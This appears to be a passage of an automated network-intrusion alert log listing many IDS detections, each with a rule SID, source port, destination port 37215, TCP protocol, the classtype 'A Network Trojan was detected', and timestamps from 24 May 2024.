              SID:2835222
              Source Port:60254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459028
              SID:2829579
              Source Port:49958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.207107
              SID:2829579
              Source Port:45908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341372
              SID:2835222
              Source Port:57652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.205855
              SID:2829579
              Source Port:42278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661907
              SID:2835222
              Source Port:53656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361081
              SID:2829579
              Source Port:56654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.041017
              SID:2835222
              Source Port:58390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150788
              SID:2835222
              Source Port:53158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537249
              SID:2829579
              Source Port:59164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.404303
              SID:2829579
              Source Port:36272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.492362
              SID:2835222
              Source Port:40108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.804495
              SID:2835222
              Source Port:60570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459472
              SID:2835222
              Source Port:36756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.394038
              SID:2829579
              Source Port:40370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235773
              SID:2835222
              Source Port:46518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.111945
              SID:2829579
              Source Port:53918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099782
              SID:2829579
              Source Port:60476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623842
              SID:2829579
              Source Port:59744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661261
              SID:2829579
              Source Port:37268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449160
              SID:2829579
              Source Port:37492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278008
              SID:2829579
              Source Port:45986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878309
              SID:2829579
              Source Port:40850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397245
              SID:2829579
              Source Port:42592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.622009
              SID:2835222
              Source Port:34386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.531904
              SID:2829579
              Source Port:53210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.112719
              SID:2829579
              Source Port:33644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662632
              SID:2835222
              Source Port:47712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153153
              SID:2829579
              Source Port:38278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.207088
              SID:2835222
              Source Port:46890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372012
              SID:2835222
              Source Port:59750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457809
              SID:2835222
              Source Port:38784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575120
              SID:2835222
              Source Port:49876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575455
              SID:2835222
              Source Port:57474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308786
              SID:2829579
              Source Port:58150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.542466
              SID:2829579
              Source Port:33050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.544209
              SID:2829579
              Source Port:33372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.066014
              SID:2835222
              Source Port:41632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365342
              SID:2835222
              Source Port:35328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.290217
              SID:2829579
              Source Port:42902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.065695
              SID:2829579
              Source Port:35632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624378
              SID:2835222
              Source Port:44418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574318
              SID:2829579
              Source Port:43408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623647
              SID:2835222
              Source Port:55208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111878
              SID:2835222
              Source Port:47886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.250703
              SID:2829579
              Source Port:42876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.249604
              SID:2835222
              Source Port:32872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.396547
              SID:2829579
              Source Port:52330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.594404
              SID:2835222
              Source Port:34728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538555
              SID:2835222
              Source Port:44910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.635795
              SID:2835222
              Source Port:40466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152628
              SID:2829579
              Source Port:38244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724767
              SID:2835222
              Source Port:49088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671474
              SID:2835222
              Source Port:58194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.162997
              SID:2829579
              Source Port:53762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188848
              SID:2829579
              Source Port:34014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099265
              SID:2835222
              Source Port:35254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368494
              SID:2829579
              Source Port:51312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154086
              SID:2835222
              Source Port:53646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279449
              SID:2829579
              Source Port:40316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245326
              SID:2835222
              Source Port:40658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.554097
              SID:2835222
              Source Port:59094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.622762
              SID:2835222
              Source Port:60488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637895
              SID:2829579
              Source Port:35038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.459039
              SID:2829579
              Source Port:35854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329425
              SID:2835222
              Source Port:52138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.070331
              SID:2829579
              Source Port:54502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.195202
              SID:2829579
              Source Port:44604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726529
              SID:2829579
              Source Port:49592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116335
              SID:2835222
              Source Port:46254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538713
              SID:2829579
              Source Port:50676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.642749
              SID:2835222
              Source Port:54786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396620
              SID:2829579
              Source Port:41222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118267
              SID:2835222
              Source Port:34282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400419
              SID:2835222
              Source Port:43574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.490514
              SID:2835222
              Source Port:56966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313585
              SID:2829579
              Source Port:57162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.252591
              SID:2835222
              Source Port:52246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.064555
              SID:2829579
              Source Port:48922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671685
              SID:2829579
              Source Port:55102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460481
              SID:2829579
              Source Port:54072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636233
              SID:2835222
              Source Port:36772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278264
              SID:2835222
              Source Port:34636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.377326
              SID:2835222
              Source Port:59156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118559
              SID:2835222
              Source Port:46534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.825660
              SID:2829579
              Source Port:41762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.166941
              SID:2835222
              Source Port:33706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.309250
              SID:2829579
              Source Port:42282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.123162
              SID:2835222
              Source Port:33306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.622802
              SID:2835222
              Source Port:49936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856951
              SID:2835222
              Source Port:48634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347819
              SID:2835222
              Source Port:57228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334151
              SID:2835222
              Source Port:58294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.054267
              SID:2829579
              Source Port:33952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.773409
              SID:2829579
              Source Port:38282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246490
              SID:2835222
              Source Port:36198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802259
              SID:2835222
              Source Port:36390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.425913
              SID:2835222
              Source Port:41144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361549
              SID:2829579
              Source Port:40284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186199
              SID:2835222
              Source Port:36658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097767
              SID:2829579
              Source Port:48582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.535364
              SID:2835222
              Source Port:47106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.060083
              SID:2835222
              Source Port:48632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920881
              SID:2835222
              Source Port:38654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.254468
              SID:2829579
              Source Port:35032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.408002
              SID:2835222
              Source Port:48378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.749055
              SID:2829579
              Source Port:36188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.115294
              SID:2829579
              Source Port:41228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596238
              SID:2829579
              Source Port:45154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547871
              SID:2829579
              Source Port:55966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.077491
              SID:2835222
              Source Port:37700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.119515
              SID:2829579
              Source Port:46346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.495353
              SID:2835222
              Source Port:43020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.483054
              SID:2835222
              Source Port:45490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.866216
              SID:2829579
              Source Port:60118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.282439
              SID:2829579
              Source Port:42708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.485492
              SID:2829579
              Source Port:37858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432565
              SID:2835222
              Source Port:59836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456913
              SID:2835222
              Source Port:49042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.380280
              SID:2829579
              Source Port:36990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.424191
              SID:2829579
              Source Port:47186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456668
              SID:2835222
              Source Port:52714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.543533
              SID:2835222
              Source Port:46298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300278
              SID:2835222
              Source Port:37534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.112791
              SID:2829579
              Source Port:41208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.629554
              SID:2835222
              Source Port:55230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504726
              SID:2835222
              Source Port:60234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235466
              SID:2835222
              Source Port:38110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334125
              SID:2829579
              Source Port:45340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478195
              SID:2835222
              Source Port:37488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519628
              SID:2829579
              Source Port:37514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.076971
              SID:2829579
              Source Port:40146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.689819
              SID:2829579
              Source Port:54378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802194
              SID:2835222
              Source Port:40818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.454384
              SID:2835222
              Source Port:50376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.494642
              SID:2835222
              Source Port:38510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204323
              SID:2835222
              Source Port:38924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.752006
              SID:2829579
              Source Port:45948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334183
              SID:2829579
              Source Port:34204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727291
              SID:2829579
              Source Port:49796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153952
              SID:2835222
              Source Port:56554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300288
              SID:2829579
              Source Port:34788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574596
              SID:2835222
              Source Port:40322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.589275
              SID:2835222
              Source Port:60578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.422201
              SID:2835222
              Source Port:45640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764000
              SID:2829579
              Source Port:59974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923426
              SID:2835222
              Source Port:33336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.402715
              SID:2835222
              Source Port:43818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.130124
              SID:2829579
              Source Port:55410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040319
              SID:2829579
              Source Port:44128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.804646
              SID:2835222
              Source Port:52808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.586525
              SID:2829579
              Source Port:41762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799308
              SID:2835222
              Source Port:38452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.268535
              SID:2835222
              Source Port:35608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542182
              SID:2829579
              Source Port:56888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456382
              SID:2829579
              Source Port:52480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118530
              SID:2829579
              Source Port:50864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.769548
              SID:2835222
              Source Port:36584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.155662
              SID:2829579
              Source Port:50542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.075428
              SID:2835222
              Source Port:60552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.978253
              SID:2835222
              Source Port:54556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279682
              SID:2829579
              Source Port:52894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148466
              SID:2835222
              Source Port:45738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.702271
              SID:2829579
              Source Port:41348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.816094
              SID:2835222
              Source Port:51568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.105666
              SID:2835222
              Source Port:56668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445070
              SID:2835222
              Source Port:54192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.121312
              SID:2835222
              Source Port:39430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.378121
              SID:2829579
              Source Port:46782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300000
              SID:2829579
              Source Port:42598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.480439
              SID:2829579
              Source Port:56284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505458
              SID:2835222
              Source Port:53236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505595
              SID:2835222
              Source Port:37142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100883
              SID:2835222
              Source Port:60264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623703
              SID:2835222
              Source Port:36776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.349870
              SID:2835222
              Source Port:57716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234107
              SID:2829579
              Source Port:33432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231810
              SID:2835222
              Source Port:34122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.208967
              SID:2829579
              Source Port:41100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516547
              SID:2835222
              Source Port:39044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.548570
              SID:2829579
              Source Port:34186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517431
              SID:2835222
              Source Port:52294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624358
              SID:2829579
              Source Port:35996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.166804
              SID:2829579
              Source Port:40436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.880828
              SID:2835222
              Source Port:46008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.282808
              SID:2829579
              Source Port:54386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232545
              SID:2829579
              Source Port:59764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.526887
              SID:2835222
              Source Port:34596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.362060
              SID:2829579
              Source Port:41726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431579
              SID:2829579
              Source Port:37204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433719
              SID:2829579
              Source Port:54562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.991737
              SID:2835222
              Source Port:52362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102516
              SID:2835222
              Source Port:43618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044798
              SID:2829579
              Source Port:45482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.119857
              SID:2829579
              Source Port:51630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361050
              SID:2829579
              Source Port:48218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482343
              SID:2835222
              Source Port:39548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.975645
              SID:2835222
              Source Port:33420
              Destination Port:37215
